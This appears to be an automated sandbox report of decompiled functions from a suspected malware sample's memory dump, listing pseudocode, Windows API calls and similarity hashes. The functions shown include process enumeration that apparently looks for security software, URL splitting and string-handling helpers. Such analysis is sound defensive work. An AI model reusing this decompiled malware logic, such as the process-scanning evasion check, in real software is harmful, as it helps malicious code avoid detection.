                                                                                                                          				int _t15;
                                                                                                                          				void* _t17;
                                                                                                                          
                                                                                                                          				_t15 = 0;
                                                                                                                          				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                          				if(_t17 != 0) {
                                                                                                                          					_t8 = Process32First(_t17,  &_v300);
                                                                                                                          					while(_t8 != 0) {
                                                                                                                          						_t9 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          						_t2 = _t9 + 0x497ee3c; // 0x73617661
                                                                                                                          						_push( &_v264);
                                                                                                                          						if( *0x497d110() != 0) {
                                                                                                                          							_t15 = 1;
                                                                                                                          						} else {
                                                                                                                          							_t8 = Process32Next(_t17,  &_v300);
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						L7:
                                                                                                                          						CloseHandle(_t17);
                                                                                                                          						goto L8;
                                                                                                                          					}
                                                                                                                          					goto L7;
                                                                                                                          				}
                                                                                                                          				L8:
                                                                                                                          				return _t15;
                                                                                                                          			}










                                                                                                                          APIs
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04974A13
                                                                                                                          • Process32First.KERNEL32(00000000,?), ref: 04974A26
                                                                                                                          • Process32Next.KERNEL32(00000000,?), ref: 04974A52
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 04974A61
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 420147892-0
                                                                                                                          • Opcode ID: d132f9df45e833733f59ec612d1010d2f240b00cf909626bf5d6881185aec606
                                                                                                                          • Instruction ID: beed913501de0bdfbc2fa21ee85461ce03a6f11b663dbdf1e3c58f3c2b6fba6c
                                                                                                                          • Opcode Fuzzy Hash: d132f9df45e833733f59ec612d1010d2f240b00cf909626bf5d6881185aec606
                                                                                                                          • Instruction Fuzzy Hash: B4F0BB326041149BD720AB669D49DEB77ACEFC5714F0001B2F515D3001EA24EE4587A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04974450() {
                                                                                                                          				void* _t1;
                                                                                                                          				intOrPtr _t5;
                                                                                                                          				void* _t6;
                                                                                                                          				void* _t7;
                                                                                                                          				void* _t11;
                                                                                                                          
                                                                                                                          				_t1 =  *0x497d2a4; // 0x340
                                                                                                                          				if(_t1 == 0) {
                                                                                                                          					L8:
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				SetEvent(_t1);
                                                                                                                          				_t11 = 0x7fffffff;
                                                                                                                          				while(1) {
                                                                                                                          					SleepEx(0x64, 1);
                                                                                                                          					_t5 =  *0x497d2f4; // 0x0
                                                                                                                          					if(_t5 == 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					_t11 = _t11 - 0x64;
                                                                                                                          					if(_t11 > 0) {
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					break;
                                                                                                                          				}
                                                                                                                          				_t6 =  *0x497d2a4; // 0x340
                                                                                                                          				if(_t6 != 0) {
                                                                                                                          					CloseHandle(_t6);
                                                                                                                          				}
                                                                                                                          				_t7 =  *0x497d270; // 0x6c00000
                                                                                                                          				if(_t7 != 0) {
                                                                                                                          					HeapDestroy(_t7);
                                                                                                                          				}
                                                                                                                          				goto L8;
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                          • SetEvent.KERNEL32(00000340,00000001,0497191C), ref: 0497445B
                                                                                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 0497446A
                                                                                                                          • CloseHandle.KERNEL32(00000340), ref: 0497448B
                                                                                                                          • HeapDestroy.KERNEL32(06C00000), ref: 0497449B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4109453060-0
                                                                                                                          • Opcode ID: 07a8a56af7413ccaa20aa73b94d51551687498011c7d889576829853cef84f9b
                                                                                                                          • Instruction ID: a5cbf647d177d36cc69aa6c09e50cd6fbee23362b4b9217697ce9ed59b4e719d
                                                                                                                          • Opcode Fuzzy Hash: 07a8a56af7413ccaa20aa73b94d51551687498011c7d889576829853cef84f9b
                                                                                                                          • Instruction Fuzzy Hash: C6F03071B44312EBFF205A35E989B063EECEF047A5B050230FD04E7181DB28EC0597A0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E04974B98() {
                                                                                                                          				void* _v0;
                                                                                                                          				void** _t3;
                                                                                                                          				void** _t5;
                                                                                                                          				void** _t7;
                                                                                                                          				void** _t8;
                                                                                                                          				void* _t10;
                                                                                                                          
                                                                                                                          				_t3 =  *0x497d364; // 0x6ff95b0
                                                                                                                          				__imp__( &(_t3[0x10]));
                                                                                                                          				while(1) {
                                                                                                                          					_t5 =  *0x497d364; // 0x6ff95b0
                                                                                                                          					_t1 =  &(_t5[0x16]); // 0x0
                                                                                                                          					if( *_t1 == 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					Sleep(0xa);
                                                                                                                          				}
                                                                                                                          				_t7 =  *0x497d364; // 0x6ff95b0
                                                                                                                          				_t10 =  *_t7;
                                                                                                                          				if(_t10 != 0 && _t10 != 0x497e823) {
                                                                                                                          					HeapFree( *0x497d270, 0, _t10);
                                                                                                                          					_t7 =  *0x497d364; // 0x6ff95b0
                                                                                                                          				}
                                                                                                                          				 *_t7 = _v0;
                                                                                                                          				_t8 =  &(_t7[0x10]);
                                                                                                                          				__imp__(_t8);
                                                                                                                          				return _t8;
                                                                                                                          			}










                                                                                                                          APIs
                                                                                                                          • RtlEnterCriticalSection.NTDLL(06FF9570), ref: 04974BA1
                                                                                                                          • Sleep.KERNEL32(0000000A,?,04975390), ref: 04974BAB
                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,04975390), ref: 04974BD9
                                                                                                                          • RtlLeaveCriticalSection.NTDLL(06FF9570), ref: 04974BEE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 58946197-0
                                                                                                                          • Opcode ID: deba34731e64b47aa5a0696da749f887aeb3da3e899ca32d322026a03565877a
                                                                                                                          • Instruction ID: 5ba1a2416e89bbe62d543bf5868b79fb4127f2d3bb7d52a00f905013e4e9e769
                                                                                                                          • Opcode Fuzzy Hash: deba34731e64b47aa5a0696da749f887aeb3da3e899ca32d322026a03565877a
                                                                                                                          • Instruction Fuzzy Hash: E6F0B278608200DFFB188B64EA99F293BE9EB45704B044139E602D7251D628AC00DB14
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E04971EC1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                                                                                          				intOrPtr* _v8;
                                                                                                                          				void* _t17;
                                                                                                                          				intOrPtr* _t22;
                                                                                                                          				void* _t27;
                                                                                                                          				char* _t30;
                                                                                                                          				void* _t33;
                                                                                                                          				void* _t34;
                                                                                                                          				void* _t36;
                                                                                                                          				void* _t37;
                                                                                                                          				void* _t39;
                                                                                                                          				int _t42;
                                                                                                                          
                                                                                                                          				_t17 = __eax;
                                                                                                                          				_t37 = 0;
                                                                                                                          				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                                                                                          				_t2 = _t17 + 1; // 0x1
                                                                                                                          				_t28 = _t2;
                                                                                                                          				_t34 = E049775F6(_t2);
                                                                                                                          				if(_t34 != 0) {
                                                                                                                          					_t30 = E049775F6(_t28);
                                                                                                                          					if(_t30 == 0) {
                                                                                                                          						E04974AAB(_t34);
                                                                                                                          					} else {
                                                                                                                          						_t39 = _a4;
                                                                                                                          						_t22 = E0497A971(_t39);
                                                                                                                          						_v8 = _t22;
                                                                                                                          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                                                                                          							_a4 = _t39;
                                                                                                                          						} else {
                                                                                                                          							_t26 = _t22 + 2;
                                                                                                                          							_a4 = _t22 + 2;
                                                                                                                          							_t22 = E0497A971(_t26);
                                                                                                                          							_v8 = _t22;
                                                                                                                          						}
                                                                                                                          						if(_t22 == 0) {
                                                                                                                          							__imp__(_t34, _a4);
                                                                                                                          							 *_t30 = 0x2f;
                                                                                                                          							 *((char*)(_t30 + 1)) = 0;
                                                                                                                          						} else {
                                                                                                                          							_t42 = _t22 - _a4;
                                                                                                                          							memcpy(_t34, _a4, _t42);
                                                                                                                          							 *((char*)(_t34 + _t42)) = 0;
                                                                                                                          							__imp__(_t30, _v8);
                                                                                                                          						}
                                                                                                                          						 *_a8 = _t34;
                                                                                                                          						_t37 = 1;
                                                                                                                          						 *_a12 = _t30;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t37;
                                                                                                                          			}















                                                                                                                          APIs
                                                                                                                          • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,04975405,00000000,00000000,73BB81D0,06FF9618,?,?,04972A8A,?,06FF9618), ref: 04971ECD
                                                                                                                            • Part of subcall function 049775F6: RtlAllocateHeap.NTDLL(00000000,00000000,04974F70), ref: 04977602
                                                                                                                            • Part of subcall function 0497A971: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04971EFB,00000000,00000001,00000001,?,?,04975405,00000000,00000000,73BB81D0,06FF9618), ref: 0497A97F
                                                                                                                            • Part of subcall function 0497A971: StrChrA.SHLWAPI(?,0000003F,?,?,04975405,00000000,00000000,73BB81D0,06FF9618,?,?,04972A8A,?,06FF9618,0000EA60,?), ref: 0497A989
                                                                                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04975405,00000000,00000000,73BB81D0,06FF9618,?,?,04972A8A), ref: 04971F2B
                                                                                                                          • lstrcpy.KERNEL32(00000000,73BB81D0), ref: 04971F3B
                                                                                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04971F47
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3767559652-0
                                                                                                                          • Opcode ID: c15754a064e0c89e47f4cf97fabdae82e74b8f2ad8fcc995737ccc347bfdea82
                                                                                                                          • Instruction ID: 27255c62feee2ec6b56a8affafeb8f743dcc30bb0597d1515374fd40b1c17faf
                                                                                                                          • Opcode Fuzzy Hash: c15754a064e0c89e47f4cf97fabdae82e74b8f2ad8fcc995737ccc347bfdea82
                                                                                                                          • Instruction Fuzzy Hash: 1121B172508255EFDB025FB8CC45AAE7FBDEF86684B1580B4F9049B311E734E9009BE0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0497131E(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                                          				void* _v8;
                                                                                                                          				void* _t18;
                                                                                                                          				int _t25;
                                                                                                                          				int _t29;
                                                                                                                          				int _t34;
                                                                                                                          
                                                                                                                          				_t29 = lstrlenW(_a4);
                                                                                                                          				_t25 = lstrlenW(_a8);
                                                                                                                          				_t18 = E049775F6(_t25 + _t29 + _t25 + _t29 + 2);
                                                                                                                          				_v8 = _t18;
                                                                                                                          				if(_t18 != 0) {
                                                                                                                          					_t34 = _t29 + _t29;
                                                                                                                          					memcpy(_t18, _a4, _t34);
                                                                                                                          					_t10 = _t25 + 2; // 0x2
                                                                                                                          					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                                                                                          				}
                                                                                                                          				return _v8;
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(004F0053,?,73B75520,00000008,06FF9364,?,049750AD,004F0053,06FF9364,?,?,?,?,?,?,049754EF), ref: 0497132E
                                                                                                                          • lstrlenW.KERNEL32(049750AD,?,049750AD,004F0053,06FF9364,?,?,?,?,?,?,049754EF), ref: 04971335
                                                                                                                            • Part of subcall function 049775F6: RtlAllocateHeap.NTDLL(00000000,00000000,04974F70), ref: 04977602
                                                                                                                          • memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,049750AD,004F0053,06FF9364,?,?,?,?,?,?,049754EF), ref: 04971355
                                                                                                                          • memcpy.NTDLL(73B769A0,049750AD,00000002,00000000,004F0053,73B769A0,?,?,049750AD,004F0053,06FF9364), ref: 04971368
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2411391700-0
                                                                                                                          • Opcode ID: 1b8216773a8b0373aad6a617d47e4571ed75eac7f915b55544730b099181de66
                                                                                                                          • Instruction ID: 6958264115a974994528f5b8699ad9b57a5deb7dc299d69ea8b8db20060f9556
                                                                                                                          • Opcode Fuzzy Hash: 1b8216773a8b0373aad6a617d47e4571ed75eac7f915b55544730b099181de66
                                                                                                                          • Instruction Fuzzy Hash: 3FF0F976900119BBDF11EFA9CC89C9F7BACEF892987154462FD04D7201EA35EA149BA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • lstrlen.KERNEL32(06FF9B10,00000000,00000000,745EC740,0497467E,00000000), ref: 049738DA
                                                                                                                          • lstrlen.KERNEL32(?), ref: 049738E2
                                                                                                                            • Part of subcall function 049775F6: RtlAllocateHeap.NTDLL(00000000,00000000,04974F70), ref: 04977602
                                                                                                                          • lstrcpy.KERNEL32(00000000,06FF9B10), ref: 049738F6
                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 04973901
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 74227042-0
                                                                                                                          • Opcode ID: c1efbf11fae76dc02cf14e5bf5b1038807f6b8e9afd01c609126dbd0b65da744
                                                                                                                          • Instruction ID: 5e5db6826cf2f332f7796a2e5b5bde6f7e7c26db30f40f04f592f716f477d358
                                                                                                                          • Opcode Fuzzy Hash: c1efbf11fae76dc02cf14e5bf5b1038807f6b8e9afd01c609126dbd0b65da744
                                                                                                                          • Instruction Fuzzy Hash: 8EE01273505625A78B119BE8AC48C6FBFADEFC96557040536FA00D3101D729DD119BE1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%